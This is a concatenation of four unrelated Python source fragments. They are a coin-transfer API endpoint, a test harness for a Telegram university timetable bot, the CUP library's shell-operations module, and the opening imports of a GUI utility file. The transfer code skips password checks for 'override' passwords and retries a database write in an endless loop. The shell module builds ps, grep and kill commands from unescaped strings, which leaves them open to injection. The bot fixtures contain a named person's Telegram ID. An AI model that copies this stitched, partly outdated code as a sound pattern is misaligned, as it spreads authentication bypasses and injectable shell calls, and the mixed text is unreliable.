if round(float(amount), DECIMALS) <= 0:
return _error("NO,Incorrect amount")
if not user_exists(username):
return _error("NO,User doesn\'t exist")
if not user_exists(recipient):
return _error("NO,Recipient doesn\'t exist")
if username in rate_count:
if rate_count[username] >= 3:
banlist.append(username)
if username in last_transfer:
if (now() - last_transfer[username]).total_seconds() <= 30:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
if not ip_addr in whitelist:
dbg("TX: rate limiting", username,
(now() - last_transfer[username]).total_seconds(), "s")
return _error(
"NO,Please wait some time before making a transaction")
try:
rate_count[username] += 1
except:
rate_count[username] = 1
if not unhashed_pass.decode() in overrides:
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(str(username),))
stored_password = datab.fetchone()[1]
try:
if not checkpw(unhashed_pass, stored_password):
return _error("NO,Invalid password")
except:
if not checkpw(unhashed_pass, stored_password.encode('utf-8')):
return _error("NO,Invalid password")
except Exception as e:
print(e)
return _error("NO,No user found: " + str(e))
else:
if memo != "None":
memo = str(memo) + " OVERRIDE"
else:
memo = "OVERRIDE"
altfeed = alt_check(ip_addr, username, True, False)
if altfeed[0]:
if not username in altfeed[1][:2]: # Filter first two accounts
return _error(f"NO,You're using alt-account(s): {altfeed[1][2]}")
try:
import random
random = random.randint(0, XXHASH_TX_PROB+1)
if random != XXHASH_TX_PROB:
global_last_block_hash_cp = sha1(
bytes(str(username)+str(amount)+str(random),
encoding='ascii')).hexdigest()
else:
global_last_block_hash_cp = xxh64(
bytes(str(username)+str(amount)+str(random),
encoding='ascii'), seed=2811).hexdigest()
if str(recipient) == str(username):
return _error("NO,You\'re sending funds to yourself")
if (str(amount) == "" or float(amount) <= 0):
return _error("NO,Incorrect amount")
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(username,))
balance = float(datab.fetchone()[3])
if (float(balance) <= float(amount)):
return _error("NO,Incorrect amount")
try:
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(recipient,))
recipientbal = float(datab.fetchone()[3])
except:
return _error("NO,Recipient doesn\'t exist")
if float(balance) >= float(amount):
balance -= float(amount)
recipientbal += float(amount)
while True:
try:
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""UPDATE Users
set balance = ?
where username = ?""",
(balance, username))
datab.execute(
"""UPDATE Users
set balance = ?
where username = ?""",
(round(float(recipientbal), 20), recipient))
conn.commit()
break
except:
pass
formatteddatetime = now().strftime("%d/%m/%Y %H:%M:%S")
with sqlconn(CONFIG_TRANSACTIONS,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""INSERT INTO Transactions
(timestamp, username, recipient, amount, hash, memo)
VALUES(?, ?, ?, ?, ?, ?)""",
(formatteddatetime,
username,
recipient,
amount,
global_last_block_hash_cp,
memo))
conn.commit()
dbg(f"Success: transferred {amount} DUCO from",
f"{username} to {recipient} ({memo})")
last_transfer[username] = now()
return _success("OK,Successfully transferred funds,"
+ str(global_last_block_hash_cp))
except Exception as e:
return _error("NO,Internal server error")
@app.route("/pool_sync/")
def api_sync_proxy():
s = socket()
loginInfos = {}
syncData = {"blocks": {}}
try:
loginInfos["host"] = str(request.args.get('host', None))
loginInfos["port"] = str(request.args.get('port', None))
loginInfos["version"] = str(request.args.get('version', None))
loginInfos["identifier"] = str(request.args.get('identifier', None))
loginInfos["name"] = request.args.get('name', None)
syncData["blocks"]["blockIncrease"] = str(request.args.get('blockIncrease', None))
syncData["blocks"]["bigBlocks"] = str(request.args.get('bigBlocks', None))
syncData["cpu"] = str(request.args.get('cpu', None))
syncData["ram"] = str(request.args.get('ram', None))
syncData["connections"] = str(request.args.get('connections', None))
except Exception as e:
return _error(f"Invalid data: {e}")
try:
s.settimeout(10)
port = random.choice([2810, 2809, 2808, 2807, 2806])
s.connect(("127.0.0.1", port))
recv_ver = s.recv(5).decode().rstrip("\n")
if not recv_ver:
dbg(f"Warning: {loginInfos['name']} connection interrupted")
return _error(f"Connection interrupted")
elif float(recv_ver) != 2.7:
dbg(f"Warning: {loginInfos['name']} server versions don't match: {2.7}, {recv_ver}")
return _error(f"Invalid ver: {recv_ver}")
s.sendall(f"PoolLogin,{json.dumps(loginInfos)}\n".encode("utf-8"))
login_state = s.recv(16).decode().rstrip("\n")
if not login_state:
dbg(f"Warning: {loginInfos['name']} connection interrupted")
return _error(f"Connection interrupted")
if login_state != "LoginOK":
dbg(f"Error: {loginInfos['name']} invalid login state: {login_state}")
return _error(login_state)
s.sendall(f"PoolSync,{json.dumps(syncData)}\n".encode("utf-8"))
sync_state = s.recv(16).decode().rstrip("\n")
if not sync_state:
dbg(f"Warning: {loginInfos['name']} connection interrupted")
return _error(f"Connection interrupted")
if sync_state != "SyncOK":
dbg(f"Error: {loginInfos['name']} invalid sync state: {sync_state}")
return _error(sync_state)
s.close()
# dbg(f"Success: {loginInfos['name']} synced")
return _success(sync_state)
except Exception as e:
if str(e) == "timed outZ":
dbg(f"Error: {loginInfos['name']} timed out")
else:
dbg(f"Error: {loginInfos['name']} {e}")
return _error("Sync error: " + str(e))
|
Tests.py
|
"""
Что то подобие тестов.
TODO: Надо переделать
"""
import threading
from DB.DataBasePG import DataBasePg
from HseUtils.HseTelegram import HseTelegram
from Settings import SettingsTelegram
from Telegram import TelegramApi
from Utils.logging import Logging
from Utils.statics import Statics
from Utils.utils import Utils
dict_res1 = {
'update_id': 477824114,
'message': {
'message_id': 2249, 'from': {
'id': 453256909, 'is_bot': False, 'first_name': 'Илья', 'last_name': 'Логинов', 'username': 'KeldKemp',
'language_code': 'ru'
}, 'chat': {
'id': 453256909, 'first_name': 'Илья', 'last_name': 'Логинов', 'username': 'KeldKemp', 'type': 'private'
}, 'date': 1603435155, 'text': 'Расписание'
}
}
dict_res2 = {
'update_id': 477824114,
'message': {
'message_id': 2249, 'from': {
'id': 453256909, 'is_bot': False, 'first_name': 'Илья', 'last_name': 'Логинов', 'username': 'KeldKemp',
'language_code': 'ru'
}, 'chat': {
'id': 453256909, 'first_name': 'Илья', 'last_name': 'Логинов', 'username': 'KeldKemp', 'type': 'private'
}, 'date': 1603435155, 'text': 'Настройки'
}
}
dict_res3 = {
'update_id': 477824114,
'message': {
'message_id': 2249, 'from': {
'id': 453256909, 'is_bot': False, 'first_name': 'Илья', 'last_name': 'Логинов', 'username': 'KeldKemp',
'language_code': 'ru'
}, 'chat': {
'id': 453256909, 'first_name': 'Илья', 'last_name': 'Логинов', 'username': 'KeldKemp', 'type': 'private'
}, 'date': 1603435155, 'text': 'Корпуса'
}
}
def groups_msg(result):
call_back_id = None
try:
last_text = result[0]['message']['text']
last_chat_id = result[0]['message']['chat']['id']
message_id = result[0]['message']['message_id']
except:
try:
last_text = result[0]['callback_query']['data']
except:
return 0
last_chat_id = result[0]['callback_query']['message']['chat']['id']
call_back_id = result[0]['callback_query']['id']
message_id = result[0]['callback_query']['message']['message_id']
if db.is_user(tg_id=int(last_chat_id)):
if last_text.find('/timetables') != -1:
hseTelegram.timetables_now(last_chat_id=last_chat_id, message_id=message_id)
elif last_text.find('/corps') != -1:
hseTelegram.get_all_corps(last_chat_id=last_chat_id, type='group')
elif last_text.find('par_dates_list') != -1:
telegram.answer_callback(call_back_id)
hseTelegram.timetables_date(last_chat_id=last_chat_id, last_text=last_text)
else:
telegram.send_msg(last_chat_id,
f'Возникли проблемы, обратитесь к @keldkemp\nErrorCode: 2\nID: {last_chat_id}')
def private_msg(result):
call_back_id = None
try:
last_text = result[0]['message']['text']
last_chat_id = result[0]['message']['chat']['id']
message_id = result[0]['message']['message_id']
try:
username = result[0]['message']['chat']['username']
except:
if db.is_user(tg_id=int(last_chat_id)):
username = ''
else:
telegram.send_msg(last_chat_id, 'Возникли проблемы, обратитесь к @keldkemp\nErrorCode: 1')
return 0
except:
try:
last_text = result[0]['callback_query']['data']
except:
return 0
last_chat_id = result[0]['callback_query']['message']['chat']['id']
call_back_id = result[0]['callback_query']['id']
message_id = result[0]['callback_query']['message']['message_id']
try:
username = result[0]['callback_query']['message']['chat']['username']
except:
if db.is_user(tg_id=int(last_chat_id)):
username = ''
else:
telegram.send_msg(last_chat_id, 'Возникли проблемы, обратитесь к @keldkemp\nErrorCode: 1')
return 0
# Запускаем потоки
threading.Thread(target=razbor, args=(last_chat_id, call_back_id, username, last_text, message_id)).start()
def razbor(last_chat_id, call_back_id, username, last_text, message_id):
if db.is_user(tg_id=int(last_chat_id)) or db.is_user(username=username):
if last_text.find('Группа//') != -1:
telegram.answer_callback(call_back_id)
group = last_text.replace('Группа// ', '')
hseTelegram.update_group(last_chat_id=last_chat_id, group=group, username=username,
message_id=message_id)
elif db.is_user(tg_id=int(last_chat_id)) is False or last_text == 'ChangeGroups//':
telegram.answer_callback(call_back_id)
hseTelegram.change_group(last_chat_id=last_chat_id, username=username)
elif last_text == 'Расписание' or last_text.find('/timetables') != -1:
hseTelegram.timetables_now(last_chat_id=last_chat_id, message_id=message_id)
elif last_text.find('par_dates_list') != -1:
telegram.answer_callback(call_back_id)
hseTelegram.timetables_date(last_chat_id=last_chat_id, last_text=last_text)
elif last_text == 'Настройки':
hseTelegram.settings(last_chat_id=last_chat_id)
elif last_text == 'Корпуса' or last_text.find('/corps') != -1:
hseTelegram.get_all_corps(last_chat_id=last_chat_id)
elif last_text.lower().find('add') != -1 and db.is_admin(last_chat_id) == 1:
hseTelegram.add_users(last_chat_id=last_chat_id, last_text=last_text)
elif last_text.lower().find('sendallmsg') != -1 and db.is_admin(last_chat_id) == 1:
indx = last_text.find(' ')
msg = last_text[indx + 1:]
hseTelegram.send_all_users_msg(msg)
elif last_text.lower().find('statics') != -1 and db.is_admin(last_chat_id) == 1:
hseTelegram.get_stat(last_chat_id=last_chat_id)
elif last_text.lower().find('updatetimetable') != -1 and db.is_admin(last_chat_id) == 1:
hseTelegram.update_timetable(last_chat_id=last_chat_id)
else:
telegram.send_msg(last_chat_id, 'main', telegram.main_keyboard)
else:
telegram.send_msg(last_chat_id,
f'Возникли проблемы, обратитесь к @keldkemp\nErrorCode: 2\nID: {last_chat_id}')
list1 = []
i = 0
while True:
list1.append(dict_res1)
list1.append(dict_res2)
list1.append(dict_res3)
if i == 100:
break
i += 1
def get_list():
if len(list1) == 0:
return None
del list1[0]
return list1
threading.stack_size(128 * 1024)
db = DataBasePg()
log = Logging()
statics = Statics(db)
settings = SettingsTelegram().get_settings_tg()
telegram = TelegramApi(settings['token'])
hseTelegram = HseTelegram(db, telegram)
offset = None
call_back_id = None
admin_id = 453256909
while True:
result = get_list()
if not result or result is None:
print('Тест завершен!')
break
last_update_id = result[0]['update_id']
offset = last_update_id + 1
# Статистика запросов
# threading.Thread(target=statics.insert_request).start()
try:
try:
if result[0]['message']['chat']['type'] == 'supergroup' or result[0]['message']['chat']['type'] == 'group':
threading.Thread(target=groups_msg, args=(result,)).start()
continue
except:
if result[0]['callback_query']['message']['chat']['type'] == 'supergroup' or \
result[0]['callback_query']['message']['chat']['type'] == 'group':
threading.Thread(target=groups_msg, args=(result,)).start()
continue
threading.Thread(target=private_msg, args=(result,)).start()
except Exception as e:
log.input_log(Utils.get_date_now_sec() + ' ' + str(e))
continue
|
oper.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*
# Copyright: [CUP] - See LICENSE for details.
# Authors: Zhao Minghao, Guannan Ma
"""
:description:
shell operations related module
"""
from __future__ import print_function
import os
import sys
import time
import uuid
import tempfile
import shutil
import signal
import random
import hashlib
import platform
import warnings
import datetime
import threading
import subprocess
import cup
from cup import decorators
from cup import err
from cup import log
# linux only import
if platform.system() == 'Linux':
from cup.res import linux
__all__ = [
'rm', 'rmrf', 'kill',
'is_process_used_port', 'is_port_used', 'is_proc_exist',
'is_proc_exist', 'is_process_running',
'contains_file', 'backup_file',
'ShellExec'
]
# universal import (platform indepedent)
else:
__all__ = [
'contains_file', 'backup_file'
]
# linux functionalities {{
# pylint: disable=C0103
def rm(name):
"""
rm the file if no exception happens.
Will not raise exception if it fails
"""
try:
os.remove(name)
except OSError as error:
cup.log.warn("rm oserror: %s" % error)
def rmrf(fpath, safemode=True):
"""
:param fpath:
files/direcotry to be deleted.
:param safemode:
True by default. You cannot delete root / when safemode is True
"""
@decorators.needlinux
def _real_rmrf(fpath, safemode):
"""
real rmrf
"""
if safemode:
if os.path.normpath(os.path.abspath(fpath)) == '/':
raise err.ShellException('cannot rmtree root / under safemode')
if os.path.isfile(fpath):
os.unlink(fpath)
else:
shutil.rmtree(fpath)
return _real_rmrf(fpath, safemode)
def is_process_running(path, name):
"""
Judge if the executable is running by comparing /proc files.
:platforms:
linux only. Will raise exception if running on other platforms
:param path:
executable current working direcotry
:param name:
executable name
:return:
return True if the process is running. Return False otherwise.
"""
@decorators.needlinux
def _real_is_proc_exist(path, name):
"""
_real_is_proc_exist
"""
path = os.path.realpath(os.path.abspath(path))
cmd = 'ps -ef|grep %s|grep -v "^grep "|grep -v "^vim "|grep -v "^less "|\
grep -v "^vi "|grep -v "^cat "|grep -v "^more "|grep -v "^tail "|\
awk \'{print $2}\'' % (name)
ret = cup.shell.ShellExec().run(cmd, 10)
pids = ret['stdout'].strip().split('\n')
if len(pids) == 0 or len(pids) == 1 and len(pids[0]) == 0:
return False
for pid in pids:
for sel_path in ["cwd", "exe"]:
cmd = 'ls -l /proc/%s/%s|awk \'{print $11}\' ' % (pid, sel_path)
ret = cup.shell.ShellExec().run(cmd, 10)
pid_path = ret['stdout'].strip().strip()
if pid_path.find(path) == 0:
# print('%s is exist: %s' % (name, path))
return True
return False
return _real_is_proc_exist(path, name)
# for compatibility. Do not delete this line:
is_proc_exist = is_process_running
def _kill_child(pid, sign):
cmd = 'ps -ef|grep %s|grep -v grep|awk \'{print $2,$3}\'' % (pid)
ret = cup.shell.ShellExec().run(cmd, 10)
pids = ret['stdout'].strip().split('\n')
for proc in pids:
p_id = proc.split()
if p_id[1] == pid:
_kill_child(p_id[0], sign)
if p_id[0] == pid:
if len(sign) == 0:
cup.shell.execshell('kill %s' % pid)
elif sign == '9' or sign == '-9':
cup.shell.execshell('kill -9 %s' % pid)
elif sign == 'SIGSTOP' or sign == '19' or sign == '-19':
cup.shell.execshell('kill -19 %s' % pid)
elif sign == 'SIGCONT' or sign == '18' or sign == '-18':
cup.shell.execshell('kill -18 %s' % pid)
else:
cup.log.error('sign error')
def kill(path, name, sign='', b_kill_child=False):
"""
will judge if the process is running by calling function
(is_process_running), then send kill signal to this process
:param path:
executable current working direcotry (cwd)
:param name:
executable name
:param sign:
kill sign, e.g. 9 for SIGKILL, 15 for SIGTERM
:b_kill_child:
kill child processes or not. False by default.
"""
path = os.path.realpath(os.path.abspath(path))
# path = os.path.abspath(path)
cmd = 'ps -ef|grep %s|grep -v grep|awk \'{print $2}\'' % (name)
ret = cup.shell.ShellExec().run(cmd, 10)
pids = ret['stdout'].strip().split('\n')
for pid in pids:
cmd = 'ls -l /proc/%s/cwd|awk \'{print $11}\' ' % (pid)
ret = cup.shell.ShellExec().run(cmd, 10)
if ret['returncode'] != 0:
return False
pid_path = ret['stdout'].strip()
if pid_path.find(path) == 0 or path.find(pid_path) == 0:
if b_kill_child is True:
_kill_child(pid, sign)
if len(sign) == 0:
cup.shell.execshell('kill %s' % pid)
elif sign == '9' or sign == '-9':
cup.shell.execshell('kill -9 %s' % pid)
elif sign == 'SIGSTOP' or sign == '19' or sign == '-19':
cup.shell.execshell('kill -19 %s' % pid)
elif sign == 'SIGCONT' or sign == '18' or sign == '-18':
cup.shell.execshell('kill -18 %s' % pid)
else:
cup.log.error('sign error')
return True
def backup_file(srcpath, filename, dstpath, label=None):
"""
Backup srcpath/filename to dstpath/filenamne.label.
If label is None, cup will use time.strftime('%H:%M:S')
:dstpath:
will create the folder if no existence
"""
if label is None:
label = time.strftime('%H:%M:%S')
if not os.path.exists(dstpath):
os.makedirs(dstpath)
shutil.copyfile(
srcpath + '/' + filename, dstpath + '/' + filename + '.' + label
)
def backup_folder(srcpath, foldername, dstpath, label=None):
"""
same to backup_file except it's a FOLDER not a FILE.
"""
if label is None:
label = time.strftime('%H:%M:%S')
if not os.path.exists(dstpath):
os.makedirs(dstpath)
os.rename(
'%s/%s' % (srcpath, foldername),
'%s/%s' % (dstpath, foldername + '.' + label)
)
def is_path_contain_file(dstpath, dstfile, recursive=False, follow_link=False):
"""
use contains_file instead. Kept still for compatibility purpose
"""
return contains_file(dstpath, dstfile, recursive, follow_link)
def contains_file(dstpath, expected_name, recursive=False, follow_link=False):
"""
judge if the dstfile is in dstpath
:param dstpath:
search path
:param dstfile:
file
:param recursive:
search recursively or not. False by default.
:return:
return True on success, False otherwise
"""
path = os.path.normpath(dstpath)
fpath = os.path.normpath(expected_name.strip())
fullpath = '{0}/{1}'.format(path, expected_name.strip())
fullpath = os.path.normpath(fullpath)
if recursive:
for (_, __, fnames) in os.walk(path, followlinks=follow_link):
for filename in fnames:
if filename == fpath:
return True
return False
else:
if os.path.exists(fullpath):
return True
else:
return False
def is_port_used(port):
"""
judge if the port is used or not (It's not 100% sure as next second, some
other process may steal the port as soon after this function returns)
:platform:
linux only (netstat command used inside)
:param port:
expected port
:return:
return True if the port is used, False otherwise
"""
@decorators.needlinux
def __is_port_used(port):
"""internal func"""
cmd = "netstat -nl | grep ':%s '" % (port)
ret = cup.shell.ShellExec().run(cmd, 10)
if 0 != ret['returncode']:
return False
stdout = ret['stdout'].strip()
if 0 == len(stdout):
return False
else:
return True
return __is_port_used(port)
def is_process_used_port(process_path, port):
"""
judge if a process is using the port
:param process_path:
process current working direcotry (cwd)
:return:
Return True if process matches
"""
# find the pid from by port
cmd = "netstat -nlp | grep ':%s '|awk -F ' ' '{print $7}'|\
cut -d \"/\" -f1" % (port)
ret = cup.shell.ShellExec().run(cmd, 10)
if 0 != ret['returncode']:
return False
stdout = ret['stdout'].strip()
if 0 == len(stdout):
return False
dst_pid = stdout.strip()
# check the path
path = os.path.abspath(process_path)
for sel_path in ['exe', 'cwd']:
cmd = 'ls -l /proc/%s/%s|awk \'{print $11}\' ' % (dst_pid, sel_path)
ret = cup.shell.ShellExec().run(cmd, 10)
pid_path = ret['stdout'].strip().strip()
if 0 == pid_path.find(path):
return True
return False
class Asynccontent(object):
"""
make a Argcontent to async_run u have to del it after using it
"""
def __init__(self):
self.cmd = None
self.timeout = None
self.pid = None
self.ret = {
'stdout': None,
'stderr': None,
'returncode': 0
}
self.child_list = []
self.cmdthd = None
self.monitorthd = None
self.subproc = None
self.tempscript = None
class ShellExec(object): # pylint: disable=R0903
"""
For shell command execution.
::
from cup import shell
shellexec = shell.ShellExec()
# timeout=None will block the execution until it finishes
shellexec.run('/bin/ls', timeout=None)
# timeout>=0 will open non-blocking mode
# The process will be killed if the cmd timeouts
shellexec.run(cmd='/bin/ls', timeout=100)
"""
def __init__(self, tmpdir='/tmp/'):
"""
:param tmpdir:
shellexec will use tmpdir to handle temp files
"""
self._subpro = None
self._subpro_data = None
self._tmpdir = tmpdir
self._tmpprefix = 'cup.shell.{0}'.format(uuid.uuid4())
@classmethod
def kill_all_process(cls, async_content):
"""
to kill all process
"""
for pid in async_content.child_list:
os.kill(pid, signal.SIGKILL)
@classmethod
def which(cls, pgm):
"""get executable"""
if os.path.exists(pgm) and os.access(pgm, os.X_OK):
return pgm
path = os.getenv('PATH')
for fpath in path.split(os.path.pathsep):
fpath = os.path.join(fpath, pgm)
if os.path.exists(fpath) and os.access(fpath, os.X_OK):
return fpath
@classmethod
def get_async_run_status(cls, async_content):
"""
get the process status of executing async cmd
:return:
None if the process has finished.
Otherwise, return a object of linux.Process(async_pid)
"""
try:
async_process = linux.Process(async_content.pid)
res = async_process.get_process_status()
except err.NoSuchProcess:
res = None
return res
@classmethod
def get_async_run_res(cls, async_content):
"""
if the process is still running the res shoule be None,None,0
"""
return async_content.ret
def async_run(self, cmd, timeout):
"""
async_run
return a dict {uuid:pid}
self.argcontent{cmd,timeout,ret,cmdthd,montor}
timeout:returncode:999
cmd is running returncode:-999
"""
def _signal_handle():
"""
signal setup
"""
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
def _target(argcontent):
argcontent.tempscript = tempfile.NamedTemporaryFile(
dir=self._tmpdir, prefix=self._tmpprefix,
delete=True
)
with open(argcontent.tempscript.name, 'w+b') as fhandle:
fhandle.write('cd {0};\n'.format(os.getcwd()))
fhandle.write(argcontent.cmd)
shexe = self.which('sh')
cmds = [shexe, argcontent.tempscript.name]
log.info(
'to async execute {0} with script {1}'.format(
argcontent.cmd, cmds)
)
try:
argcontent.subproc = subprocess.Popen(
cmds, stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
preexec_fn=_signal_handle)
except OSError:
argcontent.ret['returncode'] = -1
argcontent.ret['stderr'] = (
'failed to execute the cmd, plz check it out\'s'
)
def _monitor(start_time, argcontent):
while(int(time.mktime(datetime.datetime.now().timetuple())) - int(start_time) <
int(argcontent.timeout)):
time.sleep(1)
if argcontent.subproc.poll() is not None:
self._subpro_data = argcontent.subproc.communicate()
argcontent.ret['returncode'] = argcontent.subproc.returncode
argcontent.ret['stdout'] = self._subpro_data[0]
argcontent.ret['stderr'] = self._subpro_data[1]
return
parent = linux.Process(argcontent.subproc.pid)
children = parent.children(True)
ret_dict = []
for process in children:
ret_dict.append(process)
argcontent.child_list = ret_dict
str_warn = (
'Shell "{0}"execution timout:{1}. To kill it'.format(
argcontent.cmd, argcontent.timeout)
)
self.kill_all_process(argcontent)
argcontent.ret['returncode'] = 999
argcontent.ret['stderr'] = str_warn
argcontent.subproc.terminate()
argcontent = Asynccontent()
argcontent.cmd = cmd
argcontent.timeout = timeout
argcontent.ret = {
'stdout': None,
'stderr': None,
'returncode': -999
}
argcontent.cmdthd = threading.Thread(
target=_target, args=(argcontent,))
argcontent.cmdthd.daemon = True
argcontent.cmdthd.start()
start_time = int(time.mktime(datetime.datetime.now().timetuple()))
argcontent.cmdthd.join(0.1)
argcontent.pid = argcontent.subproc.pid
argcontent.monitorthd = threading.Thread(target=_monitor,
args=(start_time, argcontent))
argcontent.monitorthd.daemon = True
argcontent.monitorthd.start()
#this join should be del if i can make if quicker in Process.children
argcontent.cmdthd.join(0.5)
return argcontent
def run(self, cmd, timeout):
"""
refer to the class description
:param timeout:
If the cmd is not returned after [timeout] seconds, the cmd process
will be killed. If timeout is None, will block there until the cmd
execution returns
:return:
{
'stdout' : 'Success',
'stderr' : None,
'returncode' : 0
}
returncode == 0 means success, while 999 means timeout
E.g.
::
import cup
shelltool = cup.shell.ShellExec()
print shelltool.run('/bin/ls', timeout=1)
"""
def _signal_handle():
"""
signal setup
"""
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
def _pipe_asshell(cmd):
"""
run shell with subprocess.Popen
"""
tempscript = tempfile.NamedTemporaryFile(
dir=self._tmpdir, prefix=self._tmpprefix,
delete=True
)
with open(tempscript.name, 'w+b') as fhandle:
fhandle.write('cd {0};\n'.format(os.getcwd()))
fhandle.write(cmd)
shexe = self.which('sh')
cmds = [shexe, tempscript.name]
log.info(
'cup shell execute {0} with script {1}'.format(
cmd, cmds)
)
self._subpro = subprocess.Popen(
cmds, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=_signal_handle
)
self._subpro_data = self._subpro.communicate()
ret = {
'stdout': None,
'stderr': None,
'returncode': 0
}
cmdthd = threading.Thread(
target=_pipe_asshell, args=(cmd, )
)
cmdthd.start()
cmdthd.join(timeout)
if cmdthd.isAlive():
str_warn = (
'Shell "%s"execution timout:%d. Killed it' % (cmd, timeout)
)
warnings.warn(str_warn, RuntimeWarning)
parent = linux.Process(self._subpro.pid)
for child in parent.children(True):
os.kill(child, signal.SIGKILL)
ret['returncode'] = 999
ret['stderr'] = str_warn
self._subpro.terminate()
else:
self._subpro.wait()
times = 0
while self._subpro.returncode is None and times < 10:
time.sleep(1)
times += 1
ret['returncode'] = self._subpro.returncode
assert type(self._subpro_data) == tuple, \
'self._subpro_data should be a tuple'
ret['stdout'] = self._subpro_data[0]
ret['stderr'] = self._subpro_data[1]
return ret
def _do_execshell(cmd, b_printcmd=True, timeout=None):
"""
do execshell
"""
if timeout is not None and timeout < 0:
raise cup.err.ShellException(
'timeout should be None or >= 0'
)
if b_printcmd is True:
print('To exec cmd:{0}'.format(cmd))
shellexec = ShellExec()
return shellexec.run(cmd, timeout)
def execshell(cmd, b_printcmd=True, timeout=None):
"""
执行shell命令,返回returncode
"""
return _do_execshell(
cmd, b_printcmd=b_printcmd, timeout=timeout)['returncode']
def execshell_withpipe(cmd):
"""
Deprecated. Use ShellExec instead
"""
res = os.popen(cmd)
return res
def execshell_withpipe_ex(cmd, b_printcmd=True):
"""
Deprecated. Recommand using ShellExec.
"""
strfile = '/tmp/%s.%d.%d' % (
'shell_env.py', int(os.getpid()), random.randint(100000, 999999)
)
os.mknod(strfile)
cmd = cmd + ' 1>' + strfile + ' 2>/dev/null'
os.system(cmd)
if True == b_printcmd:
print(cmd)
fphandle = open(strfile, 'r')
lines = fphandle.readlines()
fphandle.close()
os.unlink(strfile)
return lines
def execshell_withpipe_str(cmd, b_printcmd=True):
"""
Deprecated. Recommand using ShellExec.
"""
return ''.join(execshell_withpipe_ex(cmd, b_printcmd))
def execshell_withpipe_exwitherr(cmd, b_printcmd=True):
"""
Deprecated. Recommand using ShellExec.
"""
strfile = '/tmp/%s.%d.%d' % (
'shell_env.py', int(os.getpid()), random.randint(100000, 999999)
)
cmd = cmd + ' >' + strfile
cmd = cmd + ' 2>&1'
os.system(cmd)
if b_printcmd:
print(cmd)
fhandle = open(strfile, 'r')
lines = fhandle.readlines()
fhandle.close()
os.unlink(strfile)
return lines
def is_proc_alive(procname, is_whole_word=False, is_server_tag=False, filters=False):
"""
Deprecated. Recommand using cup.oper.is_proc_exist
"""
# print procName
if is_whole_word:
cmd = "ps -ef|grep -w '%s'$ |grep -v grep" % procname
else:
cmd = "ps -ef|grep -w '%s' |grep -v grep" % procname
if is_server_tag:
cmd += '|grep -vwE "vim |less |vi |tail |cat |more "'
if filters:
if isinstance(filters, str):
cmd += "|grep -v '%s'" % filters
elif isinstance(filters, list):
for _, task in enumerate(filters):
cmd += "|grep -v '%s'" % task
cmd += '|wc -l'
rev = execshell_withpipe_str(cmd, False)
if int(rev) > 0:
return True
else:
return False
def forkexe_shell(cmd):
"""
fork a new process to execute cmd (os.system(cmd))
"""
try:
pid = os.fork()
if pid > 0:
return
except OSError:
sys.exit(1)
# os.chdir("/")
os.setsid()
# os.umask(0)
try:
pid = os.fork()
if pid > 0:
sys.exit(0)
except OSError:
sys.exit(1)
os.system(cmd)
def md5file(filename):
"""
compute md5 hex value of a file, return with a string (hex-value)
"""
if os.path.exists(filename) is False:
raise IOError('No such file: %s' % filename)
with open(filename, 'rb') as fhandle:
md5obj = hashlib.md5()
while True:
strtmp = fhandle.read(131072) # read 128k one time
if len(strtmp) <= 0:
break
if isinstance(strtmp, unicode):
md5obj.update(strtmp.encode('utf-8'))
else:
md5obj.update(strtmp)
return md5obj.hexdigest()
def kill9_byname(strname):
"""
kill -9 process by name
"""
fd_pid = os.popen("ps -ef | grep -v grep |grep %s \
|awk '{print $2}'" % (strname))
pids = fd_pid.read().strip().split('\n')
fd_pid.close()
for pid in pids:
os.system("kill -9 %s" % (pid))
def kill_byname(strname):
"""
kill process by name
"""
fd_pid = os.popen("ps -ef | grep -v grep |grep %s \
|awk '{print $2}'" % (strname))
pids = fd_pid.read().strip().split('\n')
fd_pid.close()
for pid in pids:
os.system("kill -s SIGKILL %s" % (pid))
def del_if_exist(path, safemode=True):
"""
delete the path if it exists, cannot delete root / under safemode
"""
if safemode and path == '/':
raise IOError('Cannot delete root path /')
if os.path.lexists(path) is False:
return -1
if os.path.isdir(path):
shutil.rmtree(path)
elif os.path.isfile(path) or os.path.islink(path):
os.unlink(path)
else:
raise IOError('Does not support deleting the type 4 the path')
def rmtree(path, ignore_errors=False, onerror=None, safemode=True):
"""
safe rmtree.
safemode, by default is True, which forbids:
1. not allowing rmtree root "/"
"""
if safemode:
if os.path.normpath(os.path.abspath(path)) == '/':
raise err.ShellException('cannot rmtree root / under safemode')
if os.path.isfile(path):
return os.unlink(path)
else:
return shutil.rmtree(path, ignore_errors, onerror)
def shell_diff(srcfile, dstfile):
"""
shell diff two files, return 0 if it's the same.
"""
cmd = 'diff %s %s' % (srcfile, dstfile)
return os.system(cmd)
def get_pid(process_path, grep_string):
"""
will return immediately after find the pid which matches
1. ps -ef|grep %s|grep -v grep|grep -vE "^[vim|less|vi|tail|cat|more] "
'|awk '{print $2}'
2. workdir is the same as ${process_path}
:param process_path:
process that runs on
:param grep_string:
ps -ef|grep ${grep_string}
:return:
return None if not found. Otherwise, return the pid
"""
cmd = (
'ps -ef|grep \'%s\'|grep -v grep|grep -vwE "vim |less |vi |tail |cat |more "'
'|awk \'{print $2}\''
) % (grep_string)
ret = cup.shell.ShellExec().run(cmd, 10)
pids = ret['stdout'].strip().split('\n')
if len(pids) == 0 or len(pids) == 1 and len(pids[0]) == 0:
return None
for pid in pids:
for sel_path in ["cwd", "exe"]:
cmd = 'ls -l /proc/%s/%s|awk \'{print $11}\' ' % (pid, sel_path)
ret = cup.shell.ShellExec().run(cmd, 10)
pid_path = ret['stdout'].strip().strip()
if pid_path.find(process_path) == 0:
return pid
return None
# end linux functionalities }}
# vi:set tw=0 ts=4 sw=4 nowrap fdm=indent
|
GuiUtils.py
|
import queue
import threading
import tkinter as tk
